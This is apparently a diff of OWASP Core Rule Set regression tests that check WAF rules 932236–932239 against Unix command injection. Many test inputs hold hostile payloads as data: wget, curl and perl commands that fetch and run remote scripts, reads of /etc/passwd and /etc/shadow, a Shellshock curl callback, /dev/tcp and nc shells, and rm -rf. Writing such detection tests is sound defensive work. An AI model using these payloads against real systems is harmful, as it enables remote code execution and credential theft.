-              Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php
-            method: GET
-            port: 80
-            uri: /get
-            version: HTTP/1.1
-          output:
-            log_contains: id "932236"
-  - test_title: 932236-8
-    desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Referer: Something true positive &#8222;The Title&#8221;. After space or new line more characters
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-              Accept-Encoding: gzip, deflate, br
-              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
-              Content-Type: application/x-www-form-urlencoded
-            method: POST
-            port: 80
-            uri: /post
-            version: HTTP/1.1
-          output:
-            no_log_contains: id "932236"
-  - test_title: 932236-9
-    desc: "False negative report - user agent"
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: localhost
-              User-Agent: ;cp /var/log/apache2/error.log evil.php
-            method: POST
-            port: 80
-            uri: /post
-            version: HTTP/1.0
-          output:
-            log_contains: id "932236"
-  - test_title: 932236-10
     desc: "False negative report - POST arguments"
     stages:
       - stage:
@@ -195,7 +26,7 @@ tests:
             data: ;cp /var/log/apache2/error.log evil.php
           output:
             log_contains: id "932236"
-  - test_title: 932236-11
+  - test_title: 932236-2
     desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an: 1'000'000"
     stages:
       - stage:
@@ -215,7 +46,7 @@ tests:
             version: HTTP/1.1
           output:
             no_log_contains: id "932236"
-  - test_title: 932236-12
+  - test_title: 932236-3
     desc: "Positive test - BB BBBZARPI - d=/dev&&(sh)0>$d/tcp/51.15.142.164/777"
     stages:
       - stage:
@@ -233,7 +64,7 @@ tests:
             version: HTTP/1.1
           output:
             log_contains: id "932236"
-  - test_title: 932236-13
+  - test_title: 932236-4
     desc: "55O5COJ5"
     stages:
       - stage:
@@ -251,7 +82,7 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932236"
-  - test_title: 932236-14
+  - test_title: 932236-5
     desc: "55O5COJ5"
     stages:
       - stage:
@@ -269,8 +100,8 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932236"
-  - test_title: 932236-15
-    desc: "9323HNQU"
+  - test_title: 932236-6
+    desc: "9323HNQU - should not be detected at PL 2"
     stages:
       - stage:
           input:
@@ -286,8 +117,8 @@ tests:
               code=;vi dddd +silent\\ \!whoami +wq
             version: HTTP/1.0
           output:
-            log_contains: id "932236"
-  - test_title: 932236-16
+            no_log_contains: id "932236"
+  - test_title: 932236-7
     desc: "9323HNQU"
     stages:
       - stage:
@@ -305,7 +136,7 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932236"
-  - test_title: 932236-17
+  - test_title: 932236-8
     desc: "9323HNQU"
     stages:
       - stage:
@@ -323,8 +154,8 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932236"
-  - test_title: 932236-18
-    desc: "9323HNQU"
+  - test_title: 932236-9
+    desc: "9323HNQU - should not be detected at PL 2"
     stages:
       - stage:
           input:
@@ -340,8 +171,8 @@ tests:
               code=;vi -c:\!pwd
             version: HTTP/1.0
           output:
-            log_contains: id "932236"
-  - test_title: 932236-19
+            no_log_contains: id "932236"
+  - test_title: 932236-10
     desc: "9323HNQU"
     stages:
       - stage:
@@ -359,7 +190,7 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932236"
-  - test_title: 932236-20
+  - test_title: 932236-11
     desc: "9323HNQU"
     stages:
       - stage:
@@ -377,7 +208,7 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932236"
-  - test_title: 932236-21
+  - test_title: 932236-12
     desc: "ATFHUJVF"
     stages:
       - stage:
@@ -395,7 +226,7 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932236"
-  - test_title: 932236-22
+  - test_title: 932236-13
     desc: "JW2SU88A"
     stages:
       - stage:
@@ -413,7 +244,7 @@ tests:
               code=;cat /path/file.gz
           output:
             log_contains: id "932236"
-  - test_title: 932236-23
+  - test_title: 932236-14
     desc: "4JOGUXYQ"
     stages:
       - stage:
@@ -431,7 +262,7 @@ tests:
               find /etc -name passwd -exec cat {} +
           output:
             log_contains: id "932236"
-  - test_title: 932236-24
+  - test_title: 932236-15
     desc: "ANQ9SN3S"
     stages:
       - stage:
@@ -449,7 +280,7 @@ tests:
               code=flock -u / whoami
           output:
             log_contains: id "932236"
-  - test_title: 932236-25
+  - test_title: 932236-16
     desc: "JW2SU88A"
     stages:
       - stage:
@@ -467,7 +298,7 @@ tests:
               code=cat /path/file.gz
           output:
             log_contains: id "932236"
-  - test_title: 932236-26
+  - test_title: 932236-17
     desc: "P6E0KY27"
     stages:
       - stage:
@@ -485,24 +316,24 @@ tests:
               code=cpulimit -l 100 -f whoami
           output:
             log_contains: id "932236"
-  - test_title: 932236-27
-    desc: "IXMZUXBG"
+  - test_title: 932236-18
+    desc: "FP agains 'fi' without word boundary"
     stages:
       - stage:
           input:
             dest_addr: 127.0.0.1
             headers:
-              User-Agent: a=nc&&$a -nlvp 555
+              User-Agent: "OWASP CRS test agent"
               Host: localhost
               Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
             method: GET
             port: 80
-            uri: /get
+            uri: /get?field_metatags[0][advanced][rights]=somevalue
             version: HTTP/1.0
           output:
-            log_contains: id "932236"
-  - test_title: 932236-28
-    desc: "IXMZUXBG"
+            no_log_contains: id "932236"
+  - test_title: 932236-19
+    desc: "FP MailerUI GitHub Issue #3220"
     stages:
       - stage:
           input:
@@ -511,15 +342,14 @@ tests:
               User-Agent: "OWASP CRS test agent"
               Host: localhost
               Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Referer: a=nc&&$a -nlvp 555
             method: GET
             port: 80
-            uri: /get
+            uri: /?args=MailerUI
             version: HTTP/1.0
           output:
-            log_contains: id "932236"
-  - test_title: 932236-29
-    desc: "FP agains 'fi' without word boundary"
+            no_log_contains: id "932236"
+  - test_title: 932236-20
+    desc: "FP tasksListView GitHub Issue #3220"
     stages:
       - stage:
           input:
@@ -530,7 +360,449 @@ tests:
               Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
             method: GET
             port: 80
-            uri: /get?field_metatags[0][advanced][rights]=somevalue
+            uri: /?args=tasksListView
             version: HTTP/1.0
           output:
             no_log_contains: id "932236"
+  - test_title: 932236-21
+    desc: System Command Injection (932236) from old modsec regressions
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip,deflate
+              Accept-Language: en-us,en;q=0.5
+              Host: localhost
+              Keep-Alive: '300'
+              Proxy-Connection: keep-alive
+              User-Agent: "OWASP CRS test agent"
+            method: GET
+            port: 80
+            uri: /?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-22
+    desc: System Command Injection (932236) from old modsec regressions
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip,deflate
+              Accept-Language: en-us,en;q=0.5
+              Host: localhost
+              Keep-Alive: '300'
+              Proxy-Connection: keep-alive
+              User-Agent: "OWASP CRS test agent"
+            method: GET
+            port: 80
+            uri: /?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-23
+    desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-24
+    desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-25
+    desc: Positive test - RCE passed in one of the args
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: |
+              arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-26
+    desc: RCE from test 932236.yaml combined with html entities in the middle
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-27
+    desc: RCE from test 932236.yaml combined with html entities at the beginning
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-28
+    desc: RCE from test 932236.yaml combined with html entities at the end
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-29
+    desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-30
+    desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-31
+    desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-32
+    desc: RCE ;top with html entities two digit decimal of 59 (;)
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=%26%2359%3B+;top"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-33
+    desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-34
+    desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-35
+    desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-36
+    desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-37
+    desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\""
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-38
+    desc: "Unix command injection"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "var=` /bin/cat /etc/passwd`"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-39
+    desc: "Unix command injection"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: "/post"
+            data: "var=`cut crs312``dig 34test`"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-40
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: "OWASP CRS test agent"
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/get?932236-1=bash%20-c%20%22echo%20test%22"
+            protocol: "http"
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-41
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: "OWASP CRS test agent"
+              Host: "localhost"
+              Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/post'
+            protocol: "http"
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-42
+    desc: Remote Command Injection test for BB finding 935E1D91
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/get?foo=time+curl+coreruleset.org"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
+  - test_title: 932236-43
+    desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/get?foo=ti''me+curl+coreruleset.org"
+            version: HTTP/1.1
+          output:
+            log_contains: id "932236"
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
index 895b941..e6dc543 100644
--- a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
@@ -157,3 +157,39 @@ tests:
             protocol: "http"
           output:
             no_log_contains: "id \"932237\""
+  - test_title: 932237-11
+    desc: "9323HNQU - should not be detected at PL 2"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            data: |
+              code=;vi dddd +silent\\ \!whoami +wq
+            version: HTTP/1.0
+          output:
+            no_log_contains: "id \"932237\""
+  - test_title: 932237-12
+    desc: "9323HNQU - should not be detected at PL 2"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            data: |
+              code=;vi -c:\!pwd
+            version: HTTP/1.0
+          output:
+            no_log_contains: "id \"932237\""
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
new file mode 100644
index 0000000..6da43a8
--- /dev/null
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
@@ -0,0 +1,42 @@
+---
+meta:
+  author: "Max Leske"
+  enabled: true
+  name: "932238.yhml"
+tests:
+  - test_title: 932238-1
+    desc: "9323HNQU"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            data: |
+              code=;vi dddd +silent\\ \!whoami +wq
+            version: HTTP/1.0
+          output:
+            log_contains: "id \"932238\""
+  - test_title: 932238-2
+    desc: "9323HNQU"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            data: |
+              code=;vi -c:\!pwd
+            version: HTTP/1.0
+          output:
+            log_contains: "id \"932238\""
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
new file mode 100644
index 0000000..56dc0a5
--- /dev/null
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
@@ -0,0 +1,357 @@
+---
+meta:
+  author: "Franziska Bühler, Max Leske"
+  description: |
+    Unix shell RCE
+      - with / without prefix
+      - command words of any length
+      - usual targets + `Referer` and `User-Agent`
+  enabled: true
+  name: 932239.yaml
+tests:
+  - test_title: 932239-1
+    desc: "Unix RCE in request headers"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: ";chmod +x evil.php"
+            method: GET
+            port: 80
+            uri: /
+            version: HTTP/1.0
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-2
+    desc: "Unix RCE in request headers - uppercase"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
